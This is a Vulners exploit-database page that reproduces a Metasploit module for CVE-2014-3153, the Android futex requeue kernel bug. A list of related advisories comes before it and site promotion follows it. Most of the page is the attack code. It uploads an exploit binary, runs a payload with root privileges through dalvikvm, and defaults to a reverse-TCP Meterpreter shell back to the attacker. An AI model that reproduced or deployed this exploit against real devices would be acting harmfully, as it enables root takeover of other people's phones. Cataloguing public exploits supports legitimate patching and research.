Vulners
Lucene search
Android Futex Requeue Kernel Exploit
| Reporter | Title | Published | Views | Family All 322 |
|---|---|---|---|---|
 | Security fix for the ALT Linux 7 package kernel-image-el-def version 2.6.32-alt25 | 21 Jun 201400:00 | – | altlinux |
| Security fix for the ALT Linux 7 package kernel-image-un-def version 1:3.14.5-alt2 | 6 Jun 201400:00 | – | altlinux |
| Security fix for the ALT Linux 7 package kernel-image-el-def version 2.6.32-alt23 | 9 Jun 201400:00 | – | altlinux |
 | Exploit for CVE-2014-3153 | 8 Nov 201509:40 | – | githubexploit |
| Exploit for CVE-2014-3153 | 20 Sep 201408:24 | – | githubexploit |
| Exploit for CVE-2014-3153 | 12 Jan 201516:53 | – | githubexploit |
 | Linux Kernel libfutex Local Root for RHEL/CentOS 7.0.1406 Exploit | 26 Nov 201400:00 | – | zdt |
 | CVE-2014-3153 | 7 Jun 201400:00 | – | attackerkb |
 | Medium: kernel | 15 Jun 201400:00 | – | amazon |
| Medium: kernel | 21 Aug 201400:00 | – | amazon |
10
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
def initialize(info={})
super( update_info( info, {
'Name' => 'Android futex requeue kernel exploit',
'Description' => %q{
This module exploits a bug in futex_requeue in the linux kernel.
Any android phone with a kernel built before June 2014 should be vulnerable.
},
'License' => MSF_LICENSE,
'Author' => [
'Pinkie Pie', #discovery
'geohot', #towelroot
'timwr' #metasploit module
],
'References' =>
[
[ 'CVE', '2014-3153' ],
[ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],
[ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],
],
'SessionTypes' => [ 'meterpreter' ],
'Platform' => 'android',
'Targets' => [[ 'Automatic', { }]],
'Arch' => ARCH_DALVIK,
'DefaultOptions' =>
{
'PAYLOAD' => 'android/meterpreter/reverse_tcp',
},
'DefaultTarget' => 0
}
))
register_options([
OptString.new("WritableDir", [ true, "Temporary directory to write files", "/data/local/tmp/" ]),
], self.class)
end
def put_local_file(remotefile)
localfile = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.elf" )
data = File.read(localfile, {:mode => 'rb'})
write_file(remotefile, data)
end
def exploit
workingdir = session.fs.dir.getwd
exploitfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
payloadfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
put_local_file(exploitfile)
cmd_exec('/system/bin/chmod 700 ' + exploitfile)
write_file(payloadfile, payload.raw)
tmpdir = datastore['WritableDir']
rootclassdir = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}"
rootpayload = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar"
rootcmd = " mkdir #{rootclassdir} && "
rootcmd += "cd #{rootclassdir} && "
rootcmd += "cp " + payloadfile + " #{rootpayload} && "
rootcmd += "chmod 766 #{rootpayload} && "
rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload"
process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true})
process.channel.read
end
end
# 0day.today [2018-01-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Feb 2015 00:00Current
0.7Low risk
Vulners AI Score0.7
EPSS0.75331